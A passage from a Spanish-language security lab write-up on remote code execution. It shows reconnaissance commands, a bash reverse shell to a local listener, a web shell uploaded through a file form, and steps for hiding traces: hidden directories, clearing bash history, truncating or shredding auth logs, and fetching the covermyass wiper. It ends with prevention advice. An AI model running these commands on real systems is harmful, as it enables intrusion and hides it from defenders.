<img src="assets/RCE/CMD/whoami.png" alt="comando whoami">
</div>
</div>
<div class="ulist">
<ul>
<li>
<p><strong>id</strong> &#8594; Podemos ver los permisos que tiene nuestro usuario.</p>
</li>
</ul>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/RCE/CMD/id.png" alt="comando id">
</div>
</div>
<div class="ulist">
<ul>
<li>
<p><strong>cat /etc/passwd</strong> &#8594; En este archivo se encuentran los usuarios que existen en el sistema</p>
</li>
</ul>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/RCE/CMD/passwd.png" alt="archivo passwd">
</div>
</div>
</div>
<div class="sect4">
<h5 id="_sistema_operativo">Sistema Operativo</h5>
<div class="ulist">
<ul>
<li>
<p><strong>uname -a</strong> &#8594; Nos dice el sistema operativo en el que se encuentra. Cómo está en un docker dentro de un Kali, podemos ver lo siguiente.</p>
</li>
</ul>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/RCE/CMD/uname.png" alt="comando uname">
</div>
</div>
</div>
<div class="sect4">
<h5 id="_reverse_shell">Reverse Shell</h5>
<div class="paragraph">
<p>Al ser root, podemos hacer todo lo que queramos, cómo si queremos borrar todo el sistema, pero también podemos mantenernos persistentes en él o acceder para tener una terminal más comoda. Hay miles de cosas que podemos hacer en está situación, por lo que vamos a ver cómo realizar una reverse shell desde la web.</p>
</div>
<div class="paragraph">
<p>Abrimos una terminal con netcat y nos ponemos a la escucha:</p>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/RCE/CMD/NetCat1.png" alt="NetCat 1">
</div>
</div>
<div class="paragraph">
<p>En la web ponemos el siguiente comando:</p>
</div>
<div class="listingblock">
<div class="content">
<pre class="highlight"><code class="language-bash" data-lang="bash">bash -c 'bash -i &gt;&amp; /dev/tcp/192.168.1.20/4444 0&gt;&amp;1'</code></pre>
</div>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/RCE/CMD/NetCat2.png" alt="NetCat 2">
</div>
</div>
<div class="paragraph">
<p>Una vez hecho esto ya estaremos conectados con netcat como root:</p>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/RCE/CMD/NetCat3.png" alt="NetCat 3">
</div>
</div>
<div class="paragraph">
<p>Ya que somos root, y estamos con infltrados en el sistema, he pensado que estaría bien tener en cuenta algunas prácticas para limpiar nuestro rastro:</p>
</div>
<div class="ulist">
<ul>
<li>
<p><strong>1. Crear directorios ocultos</strong></p>
</li>
</ul>
</div>
<div class="listingblock">
<div class="content">
<pre class="highlight"><code class="language-bash" data-lang="bash">$ mkdir /dev/shm/.secreto
$ ls -la /dev/shm/</code></pre>
</div>
</div>
<div class="paragraph">
<p>Para eliminar el directorio después de usarlo:</p>
</div>
<div class="listingblock">
<div class="content">
<pre class="highlight"><code class="language-bash" data-lang="bash">$ rmdir /dev/shm/.secreto</code></pre>
</div>
</div>
<div class="ulist">
<ul>
<li>
<p><strong>2. Borrar historial de Bash</strong></p>
</li>
</ul>
</div>
<div class="paragraph">
<p>Podemos ver el historial actual con history.</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Eliminar la variable de entorno HISTFILE:</p>
</li>
</ul>
</div>
<div class="listingblock">
<div class="content">
<pre class="highlight"><code class="language-bash" data-lang="bash">$ unset HISTFILE</code></pre>
</div>
</div>
<div class="ulist">
<ul>
<li>
<p>O redirigir el historial a /dev/null:</p>
</li>
</ul>
</div>
<div class="listingblock">
<div class="content">
<pre class="highlight"><code class="language-bash" data-lang="bash">$ HISTFILE=/dev/null
$ export HISTFILE=/dev/null</code></pre>
</div>
</div>
<div class="ulist">
<ul>
<li>
<p>Configurar para no guardar el historial</p>
</li>
</ul>
</div>
<div class="listingblock">
<div class="content">
<pre>$ HISTSIZE=0
$ HISTFILESIZE=0</pre>
</div>
</div>
<div class="ulist">
<ul>
<li>
<p>Eliminar el historial con:</p>
</li>
</ul>
</div>
<div class="listingblock">
<div class="content">
<pre>$ history -c
$ cat /dev/null &gt; ~/.bash_history &amp;&amp; history -c &amp;&amp; exit</pre>
</div>
</div>
<div class="ulist">
<ul>
<li>
<p><strong>3. Limpiar archivos de registro</strong></p>
</li>
</ul>
</div>
<div class="paragraph">
<p>Para evitar dejar rastros en los registros del sistema, podemos truncarlos en lugar de eliminarlos de esta forma no levantaremos sospechas:</p>
</div>
<div class="listingblock">
<div class="content">
<pre class="highlight"><code class="language-bash" data-lang="bash">$ truncate -s 0 /var/log/auth.log
$ echo '' &gt; /var/log/auth.log
$ cat /dev/null &gt; /var/log/auth.log</code></pre>
</div>
</div>
<div class="paragraph">
<p>También podemos usar shred para sobrescribir el archivo:</p>
</div>
<div class="listingblock">
<div class="content">
<pre class="highlight"><code class="language-bash" data-lang="bash">$ shred -zu /var/log/auth.log</code></pre>
</div>
</div>
<div class="ulist">
<ul>
<li>
<p><strong>4. Uso de herramientas</strong></p>
</li>
</ul>
</div>
<div class="paragraph">
<p><a href="https://github.com/sundowndev/covermyass">Covermyass</a> es un script automatizado para borrar huellas, limpiar archivos de registro y desactivar el historial:</p>
</div>
<div class="listingblock">
<div class="content">
<pre class="highlight"><code class="language-bash" data-lang="bash">$ curl -sSL https://github.com/sundowndev/covermyass/releases/latest/download/covermyass_linux_amd64 -o ./covermyass
$ chmod +x ./covermyass
$ ./covermyass</code></pre>
</div>
</div>
<div class="paragraph">
<p>Con opciones para borrar registros y desactivar el historial de Bash y autenticación.</p>
</div>
</div>
</div>
<div class="sect3">
<h4 id="_2_rce_mediante_subida_de_archivos_maliciosos_2">2. RCE mediante subida de archivos maliciosos.</h4>
<div class="paragraph">
<p>Ahora nos iremos a la parte de subir archivos, donde primeramente provaremos a subir uno de ejemplo:</p>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/RCE/archivos/Página.png" alt="Página">
</div>
</div>
<div class="paragraph">
<p>Voy a subir un archivo pdf para comprobar si se pueden ejecutar los archivos:</p>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/RCE/archivos/PDF1.png" alt="PDF1">
</div>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/RCE/archivos/PDF2.png" alt="PDF2">
</div>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/RCE/archivos/PDF3.png" alt="PDF3">
</div>
</div>
<div class="paragraph">
<p>Como podemos observar, podemos abrir estos archivos, por lo que vamos a realizar una web shell con permisos de root:</p>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/RCE/archivos/WebShell.png" alt="WebShell">
</div>
</div>
<div class="paragraph">
<p>De esta forma, a través de este archivo podremos ejecutar comandos como administrador, deremos usar lo siguiente en la url del archivo "?cmd=(comando)", así enviamos el comando para que el GET lo obtenga y lo pase.</p>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/RCE/archivos/WebShell2.png" alt="WebShell2">
</div>
</div>
<div class="imageblock text-center">
<div class="content">
<img src="assets/RCE/archivos/WebShell3.png" alt="WebShell3">
</div>
</div>
<div class="paragraph">
<p>Y ya podemos hacer lo que queramos como root.</p>
</div>
</div>
<div class="sect3">
<h4 id="_aclaración">Aclaración</h4>
<div class="paragraph">
<p>En este último hemos sido root todo el rato, pero eso casi nunca es así, por lo que en el siguiente pecado aprenderemos a escalar privilegios mediante capabilities u otras formas.</p>
</div>
</div>
</div>
</div>
</div>
<div class="sect1">
<h2 id="_cómo_prevenir">¿Cómo prevenir?</h2>
<div class="sectionbody">
<div class="sect2">
<h3 id="_fuerza_bruta">Fuerza Bruta</h3>
<div class="sect3">
<h4 id="_1_usar_contraseñas_seguras">1. Usar contraseñas seguras</h4>
<div class="paragraph">
<p>Como hemos visto, las credenciales se han obtenido fácilmente debido a su baja seguridad. Por ello, se recomienda evitar contraseñas predecibles como nombres propios, fechas de nacimiento o palabras comunes. Además, es buena práctica cambiarlas periódicamente para reducir riesgos en caso de filtración.</p>
</div>
</div>
<div class="sect3">
<h4 id="_2_implementar_autenticación_multifactor_mfa">2. Implementar autenticación multifactor (MFA)</h4>
<div class="paragraph">
<p>La autenticación multifactor añade una capa adicional de seguridad al requerir, además de la contraseña, una segunda forma de verificación, como un código enviado al teléfono móvil o generado por una aplicación. Esto dificulta el acceso incluso si la contraseña ha sido comprometida.</p>
</div>
</div>
<div class="sect3">
<h4 id="_3_limitar_los_intentos_de_inicio_de_sesión">3. Limitar los intentos de inicio de sesión</h4>
<div class="paragraph">
<p>Limitar el número de intentos de inicio de sesión es una medida eficaz contra los ataques de fuerza bruta. Estos ataques prueban múltiples combinaciones de credenciales en poco tiempo, por lo que establecer un límite de intentos y bloquear temporalmente la cuenta tras varios fallos puede detenerlos de forma efectiva.</p>
</div>
</div>
<div class="sect3">
<h4 id="_4_usar_sistemas_de_detección_ids_y_prevención_ips_de_intrusiones">4. Usar sistemas de detección (IDS) y prevención (IPS) de intrusiones</h4>
<div class="paragraph">
<p>Los IDS e IPS son herramientas clave para detectar y bloquear comportamientos sospechosos, como múltiples intentos de acceso fallidos. Un IDS actúa como sistema pasivo, alertando sobre actividades anómalas, mientras que un IPS puede intervenir activamente para bloquear el tráfico malicioso.</p>
</div>
<div class="paragraph">
<p>Ejemplos:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Snort</p>
</li>
<li>
<p>Suricata</p>
</li>
</ul>
</div>
</div>
<div class="sect3">
<h4 id="_5_implementar_restricciones_por_ip">5. Implementar restricciones por IP</h4>
<div class="paragraph">
<p>Restringir el acceso a servicios críticos mediante filtros por dirección IP o ubicación geográfica ayuda a reducir la superficie de ataque. De este modo, solo se permite el acceso desde ubicaciones de confianza.</p>
</div>
</div>
<div class="sect3">
<h4 id="_6_usar_captchas">6. Usar CAPTCHAs</h4>
<div class="paragraph">
<p>Los CAPTCHA son pruebas diseñadas para diferenciar a humanos de bots. Al pedir al usuario que resuelva tareas simples como identificar imágenes o escribir un texto distorsionado, se evita que scripts automatizados abusen de formularios o sistemas de autenticación.</p>
</div>
</div>
<div class="sect3">
<h4 id="_7_aplicar_limitación_de_velocidad_rate_limiting">7. Aplicar limitación de velocidad (Rate Limiting)</h4>
<div class="paragraph">
<p>Este mecanismo restringe el número de solicitudes permitidas desde una IP o usuario en un intervalo de tiempo. Al aplicarlo, se reduce la eficacia de los ataques automatizados, ya que impide probar grandes volúmenes de credenciales rápidamente.</p>
</div>
</div>
<div class="sect3">
<h4 id="_8_utilizar_un_cortafuegos_de_aplicaciones_web_waf">8. Utilizar un cortafuegos de aplicaciones web (WAF)</h4>
<div class="paragraph">
<p>El WAF protege las aplicaciones web examinando el tráfico entrante. Detecta y bloquea patrones sospechosos antes de que lleguen a la aplicación, como intentos masivos de inicio de sesión o inyecciones maliciosas.</p>
</div>
</div>
</div>
<div class="sect2">
<h3 id="_rce_2">RCE</h3>
<div class="sect3">
<h4 id="_1_validación_y_sanitización_de_entradas">1. Validación y Sanitización de Entradas</h4>
<div class="paragraph">
<p>La mayoría de los ataques RCE aprovechan vulnerabilidades como la inyección o deserialización insegura. Para prevenirlos, es fundamental validar y sanear todas las entradas del usuario, evitando el uso de funciones peligrosas como eval() o exec() que ejecutan contenido arbitrario.</p>
</div>
</div>
<div class="sect3">
<h4 id="_2_gestión_de_parches_y_actualizaciones">2. Gestión de Parches y Actualizaciones</h4>
<div class="paragraph">
<p>Mantén sistemas operativos, aplicaciones y dependencias siempre actualizados. Muchas vulnerabilidades que permiten RCE ya son conocidas y cuentan con parches disponibles.</p>
</div>
</div>
<div class="sect3">
<h4 id="_3_principio_de_mínimos_privilegios">3. Principio de Mínimos Privilegios</h4>
<div class="paragraph">
<p>Durante las pruebas, observamos que los comandos se ejecutaban con privilegios de root. Para evitar esto, es importante que los servicios se ejecuten con los permisos mínimos necesarios, reduciendo así el impacto de un posible ataque.</p>
</div>
</div>
<div class="sect3">
<h4 id="_4_desactivación_de_funcionalidades_innecesarias">4. Desactivación de Funcionalidades Innecesarias</h4>
<div class="paragraph">
<p>Deshabilita módulos, extensiones o plugins que no sean estrictamente necesarios. Cada componente extra aumenta la superficie de ataque y puede introducir vulnerabilidades.</p>
</div>
</div>
<div class="sect3">
<h4 id="_5_gestión_segura_de_memoria">5. Gestión Segura de Memoria</h4>
<div class="paragraph">
<p>Algunos ataques RCE explotan errores como los desbordamientos de búfer. Realiza análisis de seguridad periódicos para identificar fallos en la administración de memoria y corregirlos a tiempo.</p>
</div>
</div>
<div class="sect3">
<h4 id="_6_inspección_del_tráfico_de_red">6. Inspección del Tráfico de Red</h4>
<div class="paragraph">
<p>Los ataques RCE suelen realizarse de forma remota a través de la red. Utiliza herramientas de inspección profunda del tráfico (como WAF o firewalls de nueva generación) para bloquear intentos de explotación y detectar actividad remota sospechosa.</p>
</div>
</div>
<div class="sect3">
<h4 id="_7_control_de_acceso_y_segmentación">7. Control de Acceso y Segmentación</h4>
<div class="paragraph">
<p>Un atacante que consigue ejecutar código remotamente puede intentar moverse lateralmente en la red. La segmentación de red, el control de acceso y una arquitectura de confianza cero ayudan a limitar el alcance del atacante y proteger los sistemas más críticos.</p>
</div>
<div class="listingblock">
<div class="content">
<pre>"Existen dos tipos de empresas: las que han sido hackeadas y las que aún no saben que fueron hackeadas."

- John Chambers</pre>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div id="footer">
<div id="footer-text">
Last updated 2025-05-08 16:34:52 UTC
</div>
</div>
</body>
</html>